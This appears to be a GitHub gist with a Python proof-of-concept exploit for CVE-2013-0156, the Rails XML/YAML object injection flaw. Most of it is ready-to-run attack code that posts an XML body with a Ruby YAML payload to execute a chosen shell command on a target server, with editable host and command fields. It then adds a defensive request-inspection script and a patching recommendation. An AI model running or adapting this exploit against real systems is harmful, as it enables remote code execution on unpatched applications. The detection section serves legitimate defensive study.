Created August 1, 2021 21:00
CVE-2013-0156: Rails Object Injection (Detailed POC)
Date: Monday, August 2, 2021
Description: CVE-2013-0156: Rails Object Injection (Detailed POC)
Created By: ShaFdo (twitter: @ShalindaFdo)
Dependencies: requests
Usage: ./
Additional Notes: Make sure you mark "" as an executable before running it :).
import requests
# -=-=-=-=-=-=- Edit Below -=-=-=-=-=-=-
host = "" # Target URL
command = "id > public/results.txt" # Command to execute
# -=-=-=-=-=-=- Edit Above -=-=-=-=-=-=-
# [INFO] Set the content-type header to text/xml to tell the server that we're sending stuff as XML.
request_headers = {
    "Content-Type": "text/xml",
}
# [INFO] Injected the Ruby payload inside the XML (Payload source:
xml_payload = """
<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? |
`{}`;(RUBY; @executed = true) unless @executed
: !ruby/struct
:action: create
:controller: foos
required_parts: []
:action: create
:controller: foos
- :format
# [INFO] Send Request with appropriate headers & the XML payload attached to the HTTP body.
res = requests.get(host, data=xml_payload, headers=request_headers)
# Report the outcome based on the HTTP status code of the response.
if res.status_code == 200:
    print("[+] Payload Executed Successfully")
else:
    print("[-] Got Error Code {} along the way.".format(res.status_code))
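
For defenders, the request above has two recognisable traits: an XML content type, and an element whose `type` attribute asks for YAML conversion of a body carrying `!ruby/` tags. The following check for logged or proxied requests is an added example, not part of the gist; the function name, the content-type list, the inclusion of `symbol` as a second flagged type and the sample bodies are assumptions constructed for illustration.

```python
import html
import re

# Content types whose bodies are treated as XML parameters (assumed list).
XML_TYPES = ("text/xml", "application/xml")

# An element whose type attribute requests YAML or Symbol conversion.
TYPED_ELEMENT = re.compile(
    r"""<[^<>]*?\btype\s*=\s*["'](yaml|symbol)["']""", re.IGNORECASE)
# A YAML tag asking the loader to build a Ruby object.
RUBY_TAG = re.compile(r"!ruby/[a-z]+", re.IGNORECASE)


def inspect_request(content_type, body):
    """Return a list of findings for one request; empty means nothing flagged."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type not in XML_TYPES:
        return []
    # Decode character references first so type="&#121;aml" is still seen.
    # The body is only pattern-matched, never handed to an XML or YAML parser.
    decoded = html.unescape(body)
    findings = []
    for match in TYPED_ELEMENT.finditer(decoded):
        findings.append("type=%s attribute" % match.group(1).lower())
    if RUBY_TAG.search(decoded):
        findings.append("ruby yaml tag")
    return findings


# Constructed sample requests (not captured traffic, placeholder content only).
SAMPLES = [
    ("text/xml",
     '<order><note type="yaml">--- !ruby/object:Placeholder {}</note></order>'),
    ("application/xml; charset=utf-8",
     '<order><state type="&#115;ymbol">open</state></order>'),
    ("text/xml", '<order><qty type="integer">3</qty></order>'),
    ("application/json", '{"note": "type=\\"yaml\\""}'),
]

if __name__ == "__main__":
    for ctype, body in SAMPLES:
        print(ctype, "->", inspect_request(ctype, body) or "clean")
```

Pattern matching like this is a triage aid for log review and proxy rules; the durable fix is a patched Rails release that no longer accepts YAML or Symbol typed XML parameters.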

shafdo commented Aug 1, 2021

A quick preview in burp:

